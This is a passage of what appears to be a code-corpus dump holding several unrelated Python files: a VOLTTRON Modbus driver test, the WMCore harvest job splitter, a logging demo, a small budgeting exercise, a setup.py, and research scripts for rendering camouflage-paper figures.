config\nDRIVER_CONFIG_STRING = \"\"\"{\n \"driver_config\": {\n \"name\": \"write_single_registers\",\n \"device_address\": \"127.0.0.1\",\n \"port\": 5020,\n \"slave_id\": 1,\n \"baudrate\": 9600,\n \"bytesize\": 8,\n \"parity\": \"none\",\n \"stopbits\": 1,\n \"xonxoff\": 0,\n \"addressing\": \"offset\",\n \"endian\": \"big\",\n 
\"write_multiple_registers\": false,\n \"register_map\": \"config://write_single_registers_map.csv\"\n},\n \"driver_type\": \"modbus_tk\",\n \"registry_config\": \"config://write_single_registers.csv\",\n \"interval\": 120,\n \"timezone\": \"UTC\"\n}\"\"\"\n\n# modbus_tk csv config\nREGISTRY_CONFIG_STRING = \"\"\"Volttron Point Name,Register Name\nunsigned short,unsigned_short\nsample bool,sample_bool\"\"\"\n\nREGISTRY_CONFIG_MAP = \"\"\"Register Name,Address,Type,Units,Writable,Default Value,Transform\nunsigned_short,0,uint16,None,TRUE,0,scale(10)\nsample_bool,16,bool,None,TRUE,False,\"\"\"\n\n\n@pytest.fixture(scope=\"module\")\ndef agent(request, volttron_instance):\n \"\"\"Build MasterDriverAgent, add modbus driver & csv configurations\n \"\"\"\n\n # Build master driver agent\n md_agent = volttron_instance.build_agent()\n\n # Clean out master driver configurations\n md_agent.vip.rpc.call('config.store',\n 'manage_delete_store',\n 'platform.driver')\n\n # Add driver configurations\n md_agent.vip.rpc.call('config.store',\n 'manage_store',\n 'platform.driver',\n 'devices/write_single_registers',\n DRIVER_CONFIG_STRING,\n config_type='json')\n\n # Add csv configurations\n md_agent.vip.rpc.call('config.store',\n 'manage_store',\n 'platform.driver',\n 'write_single_registers.csv',\n REGISTRY_CONFIG_STRING,\n config_type='csv')\n\n md_agent.vip.rpc.call('config.store',\n 'manage_store',\n 'platform.driver',\n 'write_single_registers_map.csv',\n REGISTRY_CONFIG_MAP,\n config_type='csv')\n\n master_uuid = volttron_instance.install_agent(agent_dir=get_services_core(\"MasterDriverAgent\"),\n config_file={},\n start=True)\n\n gevent.sleep(10) # wait for the agent to start and start the devices\n\n def stop():\n \"\"\"Stop master driver agent\n \"\"\"\n volttron_instance.stop_agent(master_uuid)\n md_agent.core.stop()\n\n request.addfinalizer(stop)\n return md_agent\n\n@pytest.fixture(scope='class')\ndef modbus_server(request):\n ModbusClient = Catalog()['write_single_registers'].get_class()\n\n server_process = Server(address='127.0.0.1', port=5020)\n server_process.define_slave(1, ModbusClient, unsigned=False)\n\n server_process.start()\n time.sleep(1)\n yield server_process\n time.sleep(1)\n server_process.stop()\n\n@pytest.mark.usefixtures(\"modbus_server\")\nclass TestModbusTKDriver:\n \"\"\"\n Regression tests for the write_single_registers driver interface.\n \"\"\"\n\n def get_point(self, agent, point_name):\n \"\"\"\n Issue a get_point RPC call for the named point and return the result.\n\n @param agent: The test Agent.\n @param point_name: The name of the point to query.\n @return: The actual reading value of the point name from the RPC call.\n \"\"\"\n return agent.vip.rpc.call('platform.driver', 'get_point', 'write_single_registers', point_name).get(timeout=10)\n\n def set_point(self, agent, point_name, point_value):\n \"\"\"\n Issue a set_point RPC call for the named point and value, and return the result.\n\n @param agent: The test Agent.\n @param point_name: The name of the point to query.\n @param point_value: The value to set on the point.\n @return:The actual reading value of the point name from the RPC call.\n \"\"\"\n return agent.vip.rpc.call('platform.driver', 'set_point', 'write_single_registers', point_name, point_value).get(timeout=10)\n\n def scrape_all(self, agent):\n \"\"\"\n Issue a get_point RPC call for the device and return the result.\n\n @param agent: The test Agent.\n @return: The dictionary mapping point names to their actual values from the RPC call.\n \"\"\"\n 
return agent.vip.rpc.call('platform.driver', 'scrape_all', 'write_single_registers').get(timeout=10)\n\n    def revert_all(self, agent):\n        \"\"\"\n        Issue a revert_device RPC call for the device and return the result.\n\n        @param agent: The test Agent.\n        @return: Return value from the RPC call.\n        \"\"\"\n        return agent.vip.rpc.call('platform.driver', 'revert_device', 'write_single_registers').get(timeout=10)\n\n    def revert_point(self, agent, point_name):\n        \"\"\"\n        Issue a revert_point RPC call for the named point and return the result.\n\n        @param agent: The test Agent.\n        @param point_name: The name of the point to revert.\n        @return: Return value from the RPC call.\n        \"\"\"\n        return agent.vip.rpc.call('platform.driver', 'revert_point', 'write_single_registers', point_name).get(timeout=10)\n\n    def test_default_values(self, agent):\n        \"\"\"Test set default values\n        \"\"\"\n        self.revert_all(agent)\n\n        default_values = self.scrape_all(agent)\n        assert type(default_values) is dict\n\n        for key in default_values.keys():\n            assert default_values[key] == 0\n\n    def test_set_point(self, agent):\n        \"\"\"Test set points to new values\n        \"\"\"\n        set_value = self.set_point(agent, 'unsigned short', 6530)\n        assert set_value == 6530\n\n        set_value = self.set_point(agent, 'sample bool', True)\n        assert set_value == True\n\n    def test_get_point(self, agent):\n        \"\"\"Test get point after set point\n        \"\"\"\n        self.set_point(agent, 'unsigned short', 1230)\n        get_value = self.get_point(agent, 'unsigned short')\n        assert get_value == 1230\n\n    def test_revert_point(self, agent):\n        \"\"\"Test revert point to default value\n        \"\"\"\n        self.revert_point(agent, 'unsigned short')\n        get_value = self.get_point(agent, 'unsigned short')\n        assert get_value == 0\n\n        self.revert_point(agent, 'sample bool')\n        get_value = self.get_point(agent, 'sample bool')\n        assert get_value == False\n\n    def test_revert_all(self, agent):\n        \"\"\"Test revert device to default values\n        \"\"\"\n        self.revert_all(agent)\n\n        default_values = self.scrape_all(agent)\n        assert type(default_values) is dict\n\n        for key in default_values.keys():\n            assert default_values[key] == 0"} {"ext": "py", "sha": "1a3041f1905cd4b062404e47d44d5493d384fed3", "content": "\r\nfrom fastlogging import LogInit\r\n\r\nif __name__ == \"__main__\":\r\n    logger = LogInit(console = True, colors = True)\r\n    logger.debug(\"This is a debug message.\")\r\n    logger.info(\"This is an info message.\")\r\n    logger.warning(\"This is a warning message.\")\r\n    logger.error(\"This is an error message.\")\r\n    logger.fatal(\"This is a fatal message.\")\r\n    logger.rotate()\r\n    logger.fatal(\"This is a fatal message.\")\r\n    logger.fatal(\"This is a fatal message.\")\r\n    logger.fatal(\"This is a fatal message.\")\r\n    logger.shutdown()\r\n"} {"ext": "py", "sha": "1a30420fa31052ced8b302cf5e349419c884389f", "content": "#!/usr/bin/env python\n\"\"\"\n_Harvest_\n\n\"\"\"\nfrom future.utils import viewitems\n\nimport threading\nimport logging\n\nfrom WMCore.JobSplitting.JobFactory import JobFactory\nfrom WMCore.Services.UUIDLib import makeUUID\nfrom WMCore.DAOFactory import DAOFactory\nfrom WMCore.JobSplitting.LumiBased import isGoodRun, isGoodLumi\nfrom WMCore.DataStructs.Run import Run\nfrom WMCore.WMSpec.WMTask import buildLumiMask\n\n\nclass Harvest(JobFactory):\n    \"\"\"\n    _Harvest_\n\n    Job splitting algorithm which creates a single job for all files\n    in the fileset (not necessarily just available files).\n    Two distinct modes, Periodic and EndOfRun.\n\n    In Periodic mode, we periodically create a job processing all\n    
files. A job will not be created until the previous job (if\n there is one) has been completed and there are new available\n files in the fileset. The specified period is the amount of\n time in seconds between the end of a job and the creation of\n another job.\n\n In EndOfRun mode, create a job processing all files once the\n input file has been closed. This means there will only be\n a single job in total for the subscription.\n\n For the EndOfRun mode support a sibling parameters that is\n set if there is also a Periodic subscription. In this case\n wait until the Periodic subscription is finished before\n triggering the EndOfRun harvesting.\n\n \"\"\"\n\n def createJobsLocationWise(self, fileset, endOfRun, dqmHarvestUnit, lumiMask, goodRunList):\n\n myThread = threading.currentThread()\n fileset.loadData(parentage=0)\n allFiles = fileset.getFiles()\n\n # sort by location and run\n locationDict = {}\n runDict = {}\n for fileInfo in allFiles:\n\n locSet = frozenset(fileInfo['locations'])\n runSet = fileInfo.getRuns()\n\n if len(locSet) == 0:\n logging.error(\"File %s has no locations!\", fileInfo['lfn'])\n if len(runSet) == 0:\n logging.error(\"File %s has no run information!\", fileInfo['lfn'])\n\n # Populate a dictionary with [location][run] so we can split jobs according to those different combinations\n if locSet not in locationDict:\n locationDict[locSet] = {}\n\n fileInfo['runs'] = set()\n # Handle jobs with run whitelist/blacklist\n if goodRunList:\n runDict[fileInfo['lfn']] = set()\n for run in runSet:\n if run.run in goodRunList:\n runDict[fileInfo['lfn']].add(run)\n if run.run in locationDict[locSet]:\n locationDict[locSet][run.run].append(fileInfo)\n else:\n locationDict[locSet][run.run] = [fileInfo]\n elif lumiMask:\n # it has lumiMask, thus we consider only good run/lumis\n newRunSet = []\n for run in runSet:\n if not isGoodRun(lumiMask, run.run):\n continue\n # then loop over lumis\n maskedLumis = []\n for lumi in run.lumis:\n if not isGoodLumi(lumiMask, run.run, lumi):\n continue\n maskedLumis.append(lumi)\n\n if not maskedLumis:\n continue\n maskedRun = Run(run.run, *maskedLumis)\n newRunSet.append(maskedRun)\n\n if run.run in locationDict[locSet]:\n locationDict[locSet][run.run].append(fileInfo)\n else:\n locationDict[locSet][run.run] = [fileInfo]\n if newRunSet:\n runDict[fileInfo['lfn']] = newRunSet\n else:\n # no LumiList and no run white or black list\n runDict[fileInfo['lfn']] = runSet\n for run in runSet:\n if run.run in locationDict[locSet]:\n locationDict[locSet][run.run].append(fileInfo)\n else:\n locationDict[locSet][run.run] = [fileInfo]\n\n # create separate jobs for different locations\n self.newGroup()\n self.jobCount = 0\n baseName = makeUUID()\n self.newGroup()\n\n if endOfRun:\n harvestType = \"EndOfRun\"\n else:\n harvestType = \"Periodic\"\n\n for location in locationDict:\n\n if dqmHarvestUnit == \"byRun\":\n self.createJobByRun(locationDict, location, baseName, harvestType, runDict, endOfRun)\n else:\n self.createMultiRunJob(locationDict, location, baseName, harvestType, runDict, endOfRun)\n\n return\n\n def createJobByRun(self, locationDict, location, baseName, harvestType, runDict, endOfRun):\n \"\"\"\n _createJobByRun_\n\n Creates one job per run for all files available at the same location.\n \"\"\"\n\n for run in locationDict[location]:\n # Should create at least one job for every location/run, putting this here will do\n self.jobCount += 1\n self.newJob(name=\"%s-%s-Harvest-%i\" % (baseName, harvestType, self.jobCount))\n for f in 
locationDict[location][run]:\n for fileRun in runDict[f['lfn']]:\n if fileRun.run == run:\n self.currentJob['mask'].addRun(fileRun)\n break\n self.currentJob.addFile(f)\n\n if endOfRun:\n self.currentJob.addBaggageParameter(\"runIsComplete\", True)\n self.mergeLumiRange(self.currentJob['mask']['runAndLumis'])\n return\n\n def createMultiRunJob(self, locationDict, location, baseName, harvestType, runDict, endOfRun):\n \"\"\"\n _createMultiRunJob_\n\n Creates a single harvesting job for all files and runs available\n at the same location.\n \"\"\"\n\n self.jobCount += 1\n self.newJob(name=\"%s-%s-Harvest-%i\" % (baseName, harvestType, self.jobCount))\n for run in locationDict[location]:\n for f in locationDict[location][run]:\n for fileRun in runDict[f['lfn']]:\n if fileRun.run == run:\n self.currentJob['mask'].addRun(fileRun)\n break\n if f not in self.currentJob['input_files']:\n self.currentJob.addFile(f)\n\n if endOfRun:\n self.currentJob.addBaggageParameter(\"runIsComplete\", True)\n self.mergeLumiRange(self.currentJob['mask']['runAndLumis'])\n\n # now calculate the minimum and maximum run number, it has to go to the root name\n minRun = min(self.currentJob['mask']['runAndLumis'].keys())\n maxRun = max(self.currentJob['mask']['runAndLumis'].keys())\n\n self.currentJob.addBaggageParameter(\"multiRun\", True)\n self.currentJob.addBaggageParameter(\"runLimits\", \"-%s-%s\" % (minRun, maxRun))\n\n return\n\n def mergeLumiRange(self, runLumis):\n \"\"\"\n _mergeLumiRange_\n\n Merges the interesection of lumi ranges.\n \"\"\"\n for run, lumis in viewitems(runLumis):\n lumis.sort(key=lambda sublist: sublist[0])\n fixedLumis = [lumis[0]]\n for lumi in lumis:\n if (fixedLumis[-1][1] + 1) >= lumi[0]:\n fixedLumis[-1][1] = lumi[1]\n else:\n fixedLumis.append(lumi)\n self.currentJob['mask']['runAndLumis'][run] = fixedLumis\n\n def algorithm(self, *args, **kwargs):\n \"\"\"\n _algorithm_\n\n \"\"\"\n\n myThread = threading.currentThread()\n\n periodicInterval = kwargs.get(\"periodic_harvest_interval\", 0)\n periodicSibling = kwargs.get(\"periodic_harvest_sibling\", False)\n dqmHarvestUnit = kwargs.get(\"dqmHarvestUnit\", \"byRun\")\n runs = kwargs.get(\"runs\", None)\n lumis = kwargs.get(\"lumis\", None)\n runWhitelist = set(kwargs.get('runWhitelist', []))\n runBlacklist = set(kwargs.get('runBlacklist', []))\n goodRunList = runWhitelist.difference(runBlacklist)\n\n daoFactory = DAOFactory(package=\"WMCore.WMBS\",\n logger=myThread.logger,\n dbinterface=myThread.dbi)\n\n releasePeriodicJobDAO = daoFactory(classname=\"JobSplitting.ReleasePeriodicJob\")\n periodicSiblingCompleteDAO = daoFactory(classname=\"JobSplitting.PeriodicSiblingComplete\")\n\n fileset = self.subscription.getFileset()\n fileset.load()\n\n lumiMask = {}\n if runs and lumis:\n lumiMask = buildLumiMask(runs, lumis)\n\n if periodicInterval and periodicInterval > 0:\n\n # Trigger the Periodic Job if\n # * it is the first job OR\n # * the last job ended more than periodicInterval seconds ago\n triggerJob = releasePeriodicJobDAO.execute(subscription=self.subscription[\"id\"], period=periodicInterval)\n\n if triggerJob:\n myThread.logger.debug(\"Creating Periodic harvesting job\")\n self.createJobsLocationWise(fileset, False, dqmHarvestUnit, lumiMask, goodRunList)\n\n elif not fileset.open:\n\n # Trigger the EndOfRun job if\n # * (same as Periodic to not have JobCreator go nuts and stop after the first iteration)\n # * there is no Periodic sibling subscription OR\n # * the Periodic sibling subscription is complete\n triggerJob = 
releasePeriodicJobDAO.execute(subscription=self.subscription[\"id\"], period=3600)\n if triggerJob and periodicSibling:\n triggerJob = periodicSiblingCompleteDAO.execute(subscription=self.subscription[\"id\"])\n\n if triggerJob:\n myThread.logger.debug(\"Creating EndOfRun harvesting job\")\n self.createJobsLocationWise(fileset, True, dqmHarvestUnit, lumiMask, goodRunList)\n\n return\n"} {"ext": "py", "sha": "1a30423226ce9ab558f07c0ade68374e66048de9", "content": "Experiment(description='Trying latest code on classic data sets',\n data_dir='../data/tsdlr-renamed/',\n max_depth=10, \n random_order=False,\n k=1,\n debug=False, \n local_computation=False, \n n_rand=9,\n sd=2, \n jitter_sd=0.1,\n max_jobs=400, \n verbose=False,\n make_predictions=False,\n skip_complete=True,\n results_dir='../results/2014-01-16-GPSS-full/',\n iters=250,\n base_kernels='SE,Per,Lin,Const,Noise',\n random_seed=3,\n period_heuristic=3,\n max_period_heuristic=5,\n period_heuristic_type='min',\n subset=True,\n subset_size=250,\n full_iters=10,\n bundle_size=5,\n additive_form=False,\n mean='ff.MeanZero()', # Starting mean\n kernel='ff.NoiseKernel()', # Starting kernel\n lik='ff.LikGauss(sf=-np.Inf)', # Starting likelihood \n score='bic',\n search_operators=[('A', ('+', 'A', 'B'), {'A': 'kernel', 'B': 'base'}),\n ('A', ('*', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),\n ('A', ('*-const', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),\n ('A', 'B', {'A': 'kernel', 'B': 'base'}),\n ('A', ('CP', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),\n ('A', ('CW', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),\n ('A', ('B', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),\n ('A', ('BL', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),\n ('A', ('None',), {'A': 'kernel'})])\n"} {"ext": "py", "sha": "1a30435be98cac62eb2411e405c70fd46cae1f64", "content": "movie_budget = float(input())\namount_of_statists = int(input())\nprice_for_clothes_for_one_statist = float(input())\n\ndecor = movie_budget * (10/100)\ntotal_price_for_clothes = price_for_clothes_for_one_statist * amount_of_statists\n\nif amount_of_statists > 150:\n total_price_for_clothes *= 0.90\n\ntotal_movie_amount = total_price_for_clothes + decor\n\nif total_price_for_clothes + decor > movie_budget:\n print(\"Not enough money!\")\n print(f\"Wingard needs {total_movie_amount - movie_budget:.2f} leva more.\")\n\nelif total_price_for_clothes + decor <= movie_budget:\n print(\"Action!\")\n print(f\"Wingard starts filming with {movie_budget - total_movie_amount:.2f} leva left.\")"} {"ext": "py", "sha": "1a30438cf9de8ad0ff1abc9511083c8c94a41afd", "content": "from setuptools import setup, find_packages\n\n\nwith open('README.md') as f:\n readme = f.read()\n\nsetup(\n name='Workbench',\n version='0.1.1',\n description='Timesaver for psd2html (markup)',\n long_description=readme,\n author='Bohdan Khorolets',\n author_email='b@khorolets.com',\n url='https://github.com/khorolets/workbench',\n packages=find_packages(),\n entry_points={\n 'console_scripts': [\n 'workbench = workbench.__init__:manager.run',\n ],\n },\n install_requires=list(filter(None, [\n 'flask',\n 'flask-script',\n 'elizabeth',\n ])),\n)\n"} {"ext": "py", "sha": "1a3043bb509bd9f486ffad888b2bad22b07531b8", "content": "import util as ut, glob, os, dset, box, img as ig, experiments, numpy as np, scipy.io, camo, copy, rotation, mvg, imtable, iputil as ip, pylab, planefit, glob, tour\n\n# Code for generating the figures/videos in the paper and the talk\n\nRESDIR_LOO = 
'/data/scratch/aho/camo-results/camera-ready-loo/loo'\nRESDIR_NOLOO = '/data/scratch/aho/camo-results/camera-ready-noloo/noloo'\n\nSTATS_PATH = '/data/vision/billf/camo/camo/nondetect/results/stats/stats.pk'\n\nALL_SCENES = experiments.classic_scenes + experiments.new_scenes\n\ndef make_path(loo_s, alg_name, scene = ''):\n assert loo_s in ('loo', 'noloo')\n base = RESDIR_LOO if loo_s == 'loo' else RESDIR_NOLOO\n\n return ut.pjoin(base, idx_from_alg(alg_name), scene)\n\ndef idx_from_alg(alg_name):\n return str(METHODS.index(alg_name)+1)\n \ndef path_from_scene(scene):\n return ut.pjoin('../data', scene)\n\n# duplicated from 4-8 in experiments.py\nMETHODS = ['uniform', 'mean', 'random', 'greedy', 'occlusion', 'stable-robust', 'occlusion-wide', 'interior-wide', 'occlusion-wide-nostable']\ntested_scenes = experiments.classic_scenes + experiments.new_scenes\n\ndef make_teaser():\n name = 'bookshelf-real'\n in_dir = make_path('noloo', 'interior-wide', name)\n out_dir = '../results/teaser-bookshelf-interior'\n ut.mkdir(out_dir)\n print in_dir\n for in_fname in sorted(glob.glob(ut.pjoin(in_dir, '*.jpg'))):\n base = os.path.split(in_fname)[1]\n out_fname = ut.pjoin(out_dir, base.replace('.jpg', '.pdf'))\n assert not os.path.exists(out_fname)\n print in_fname, out_fname\n os.system('convert %s %s' % (in_fname, out_fname))\n\ndef make_scene_fig(nscenes = 20, ims_per_scene = 2, todo = ['fig']):\n with ut.constant_seed(0):\n method = 'occlusion-wide'\n # random sample\n #all_scenes = sorted(glob.glob(make_path('noloo', method, '*')))\n #scenes = ut.sample_at_most(all_scenes, nscenes)\n\n #already_in_paper = 'couch3-real bookshelf-real'.split()\n already_in_paper = ''.split()\n \n ok_scenes = []\n # these mess up the diagram\n for scene in tested_scenes:\n shape = dset.Scan(path_from_scene(scene)).full_shape\n ratio = (float(shape[1]) / float(shape[0]))\n if abs(ratio - 1.5 ) >= 0.01 or (scene in already_in_paper):\n print 'skipping', scene, 'bad aspect ratio', ratio, 'or already in paper'\n else:\n ok_scenes.append(scene)\n\n #scenes = ut.sample_at_most(ut.shuffled(scenes), nscenes)\n scenes = ut.sample_at_most(ut.shuffled(ok_scenes), nscenes)\n\n print '\\n'.join(scenes)\n\n if 'show' in todo:\n table = []\n for scene in scenes:\n print scene\n scan = dset.Scan(path_from_scene(scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]\n\n row = [scene]\n assert ims_per_scene == 2\n # show frames from this result\n # choose two that aren't used in the solution and which are representative viewpoints\n # this is nontrivial to do programmatically; pick them by hand\n # include in the UI a way to verify that the same image is not being used\n # note that due to the sampling some views might be of faces that have no label (check this!)\n for frame in scan.frames:\n row += [frame, ('cycle', [mesh.render(scan, frame, texel_colors), scan.im(frame)])]\n table.append(row)\n\n ig.show(table)\n\n if 'fig' in todo:\n frame_choices = \\\n {'mit-31' : 11,\n 'mit-29' : 0,\n 'disrupt-8' : 12,\n 'mit-12': 15,\n 'patio2-real' : 1,\n 'walden-tree1' : 9,\n 'mit-12' : 19,\n 'mit-21' : 8,\n 'charlottesville-6' : 6,\n 'walden-log' : 6,\n 'charlottesville-2' : 8,\n 'charlottesville-9' : 6,\n 'charlottesville-1' : 7,\n 'disrupt-6' : 0,\n 'mit-20' : 3,\n 'mit-14': 13,\n 'walden-tree3' : 0,\n 'mit-6' : 6,\n 'mit-1' : 8,\n 'mit-5' : 16,\n 'couch3-real' : 6,\n 'bookshelf-real' : 3,\n 'charlottesville-7' : 9,\n 'mit-26' : 8,\n 
'mit-28' : 13,\n 'mit-13' : 7,\n 'disrupt-11' : 7,\n 'couch5-real' : 2,\n 'walden-brush2' : 0,\n 'mit-9' : 0,\n 'mit-27' : 0,\n 'charlottesville-3' : 1,\n 'mit-37' : 4,\n 'mit-16' : 13,\n }\n\n out_base = '../results/scene-fig'\n #assert not os.path.exists(out_base)\n ut.mkdir(out_base)\n\n scene_acc = ut.load(STATS_PATH)\n\n scenes_by_easiness = sorted(scenes, key = lambda x : -np.mean(scene_acc[x, idx_from_alg(method)]))\n \n for si, scene in enumerate(scenes_by_easiness):\n print scene, np.mean(scene_acc[scene, idx_from_alg(method)])\n\n # easier than deriving the image number from the output files\n scan = dset.Scan(path_from_scene(scene))\n texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]\n frame = frame_choices[scene]\n #out_path = ut.pjoin(out_base, 'scene-%d.pdf' % (1+si))\n out_path = ut.pjoin(out_base, 'scene-%d.png' % (1+si))\n #assert not os.path.exists(out_path)\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n ig.save(out_path, mesh.render(scan, frame, texel_colors))\n \ndef make_multiview_fig(n = None):\n method = 'occlusion-wide'\n scene_choices = ['mit-1', 'charlottesville-1', 'disrupt-11']\n frame_choices = {'mit-1' : [0, 3, 7, 10], 'charlottesville-1' : [0, 2, 5, 8], 'disrupt-11' : [0, 4, 7, 10]}\n\n out_base = '../results/multiview-fig'\n #assert not os.path.exists(out_base)\n ut.mkdir(out_base)\n \n for si, scene in enumerate(scene_choices[:n]):\n scan = dset.Scan(path_from_scene(scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n frames = frame_choices[scene]\n for fi, frame in enumerate(frames):\n out_path = ut.pjoin(out_base, 'scene-%d-%d.png' % (1+si, 1+fi))\n #assert not os.path.exists(out_path)\n texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]\n \n #ig.save(out_path, mesh.render(scan, frame, texel_colors))\n #ig.save(out_path, render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True))\n if scene == 'mit-1':\n occ_thresh = 1.25#1.8\n else:\n occ_thresh = None\n\n if scene == 'charlottesville-1':\n occ_thresh = 2.5\n d_sc = 1.2\n else:\n d_sc = 1.\n \n ig.save(out_path, render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True, occ_thresh = occ_thresh, dim_sc = d_sc))\n\n # def dilate_occ(scan, mesh, frame):\n # occ = camo.occlusion_texels(scan, mesh, frame, thresh = 1.5, only_border = True)\n # as_juv = mesh.index_as_juv(occ).copy()\n\n # for j in xrange(as_juv.shape[0]):\n # #dist, ind = scipy.ndimage.distance_transform_edt(1 - as_juv[j], return_indices = True)\n # if np.any(as_juv[j]):\n # dist, ind = scipy.ndimage.distance_transform_bf(1 - as_juv[j], metric = 'taxicab', return_indices = True)\n # dist[ind[0] < 0] = 1e10\n # as_juv[j, dist <= 10] = True\n\n # return np.logical_and(mesh.texel_visible(scan, frame), mesh.index_as_flat(as_juv))\n\n\n\ndef clean_occ(scan, mesh, frame):\n occ = camo.occlusion_texels(scan, mesh, frame, thresh = 1.5, only_border = True)\n as_juv = mesh.index_as_juv(occ).copy()\n\n for j in xrange(as_juv.shape[0]):\n w, h = as_juv.shape[1:]\n for u, v in [(0, range(h)),\n (range(w), 0),\n (range(w), -1),\n (-1, range(h))]:\n as_juv[j, u, v] = (np.mean(as_juv[j, u, v]) >= 0.5)\n \n #dist, ind = scipy.ndimage.distance_transform_edt(1 - as_juv[j], return_indices = True)\n # if np.any(as_juv[j]):\n # dist, ind = scipy.ndimage.distance_transform_bf(1 - as_juv[j], metric = 'taxicab', return_indices = True)\n # dist[ind[0] < 0] = 1e10\n # as_juv[j, dist <= 10] = 
True\n\n return np.logical_and(mesh.texel_visible(scan, frame), mesh.index_as_flat(as_juv))\n\n\ndef scan_fullres(fr, path):\n if fr:\n return dset.Scan(path, max_dim = None)\n else:\n return dset.Scan(path)\n\n \ndef occlusion_mask(scan, mesh, frame, thresh = 2., outline = False):\n mask = box.mask(scan, mesh, frame)\n #D = scipy.ndimage.distance_transform_edt(mask)\n D = scipy.ndimage.distance_transform_edt(mask)\n return D <= thresh, D\n #return np.logical_and(mask, D <= thresh)\n\n\ndef mark_occlusion_texels(tc, scan, mesh, frame, thresh, mesh_occ_mask = None, p = 1):\n tc = tc.copy()\n\n mask = box.mask(scan, mesh, frame)\n if mesh_occ_mask is not None:\n mask = (mask & -mesh_occ_mask)\n \n D = scipy.ndimage.distance_transform_edt(mask)\n \n #occ_mask = np.array(occlusion_mask(scan, mesh, frame, thresh = thresh), 'd')\n occ_mask = np.array(D, 'd')\n \n vis = mesh.texel_visible(scan, frame)\n proj = scan.project(frame, mesh.texel_pts)\n proj = np.array(np.round(proj), 'l')\n occ = np.zeros(mesh.ntexels, 'd')\n occ[vis] = occ_mask[proj[vis, 1], proj[vis, 0]]\n\n w = np.zeros_like(occ)\n w[occ < thresh] = p#1\n \n # scale the texels that are not totally on the boundary\n ok = (thresh <= occ) & (occ < 1+thresh)\n # anti-alias and (optionally) weight\n w[ok] = p*((1+thresh) - occ[ok])\n assert np.all((0 <= w) & (w <= 1))\n tc = tc*(1-w[:, np.newaxis]) + 255*w[:, np.newaxis]\n return tc\n\n\ndef render_cube(scene, mesh, texel_colors, frame, crop_size, fullres = False, outline = False,\n frame_using_cube = False, occ_thresh = None, draw_boundaries = False, im = None, use_fr = True, dim_sc = 1., show_cube = True):\n scan = scan_fullres(fullres, scene)\n \n if im is None:\n im_input = scan.im(frame)\n else:\n im_input = im\n\n tc = texel_colors.copy()\n\n mask = box.mask(scan, mesh, frame)\n ys, xs = np.nonzero(mask)\n cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))\n\n if frame_using_cube:\n box_rect = ut.bbox2d(np.array([xs, ys]).T)\n d = int(round(dim_sc * min(4*max(box_rect[2:]), min(scan.im(0).shape[:2]) - 1)))\n rect = ut.rect_centered_at(cx, cy, d, d)\n rect = ut.shift_in_bounds(scan.im(0).shape, rect)\n scale = float(crop_size)/rect[2]\n print box_rect, rect, scale\n else:\n rect = None\n scale = 1.\n\n # if not show_cube:\n # im = scan.im(frame)\n # rect = ut.rect_centered_at(cx, cy, crop_size, crop_size)\n # crop_size /= scan_fullres(False, scan.path).scale\n # return ig.sub_img(im, ut.rect_im_intersect(im, rect))\n \n if outline:\n if rect is not None:\n assert rect[2] == rect[3]\n #scan_fr = scan_fullres(True, scene)\n scan_fr = scan_fullres(use_fr, scene)\n print 'scale', scale\n\n if occ_thresh is None:\n occ_thresh = 2.\n occ_thresh /= scale\n\n # occ = camo.occlusion_texels(scan_fr, mesh, frame, thresh = occ_thresh, only_border = False)\n # tc[occ] = 255\n\n \n tc = mark_occlusion_texels(tc, scan_fr, mesh, frame, thresh = occ_thresh)\n \n im_up = ig.resize(im_input, scan_fr.im(frame).shape)\n #im = ig.resize(mesh.render(scan_fr, frame, tc, im = im_up), scan.im(frame).shape)\n im_fr = mesh.render(scan_fr, frame, tc, im = im_up)\n im = ig.resize(im_fr, scan.im(frame).shape)\n if not show_cube:\n im = scan.im(frame)\n #ig.show([im_fr, im])\n #assert im.shape[0] == im.shape[1]\n else:\n if show_cube:\n im = mesh.render(scan, frame, tc)\n else:\n im = scan.im(frame)\n \n \n if rect is not None:\n if draw_boundaries:\n return ig.draw_rects(im, [rect])\n else:\n return ig.sub_img(im, rect)\n if fullres:\n crop_size /= scan_fullres(False, scan.path).scale\n #sc = 
(crop_size/2.)/float(box_rect[2])\n elif crop_size is None:\n return im\n else:\n rect = ut.rect_centered_at(cx, cy, crop_size, crop_size)\n return ig.sub_img(im, ut.rect_im_intersect(im, rect))\n \ndef make_real_cube():\n scene = 'bookshelf-real'\n method = 'interior-wide'\n scan = dset.Scan(path_from_scene(scene))\n\n #texel_colors = camo.to_color_space_2d(ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0])\n if 0:\n print 'hires'\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 512)\n scan = dset.Scan(path_from_scene(scene), max_dim = 2000)\n texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'interior-wide'))\n ut.save('../results/real-interior.pk', texel_colors)\n ut.toplevel_locals()\n elif 1:\n # upgrade to larger texel size; bigger images\n texel_colors0, results0, labels0 = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][:3]\n mesh0 = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 256)\n texsize = 1024\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = texsize)\n geom = camo.Geom(scan, mesh)\n scan = dset.Scan(path_from_scene(scene), max_dim = 2000)\n label_color, label_valid = camo.label_colors(scan, mesh, geom, labels0, invisible_colors = True)\n\n as_juv0 = mesh0.index_as_juv(results0).copy()\n as_juv1 = mesh.index_as_juv(np.zeros(mesh.ntexels)).copy()\n\n for j in 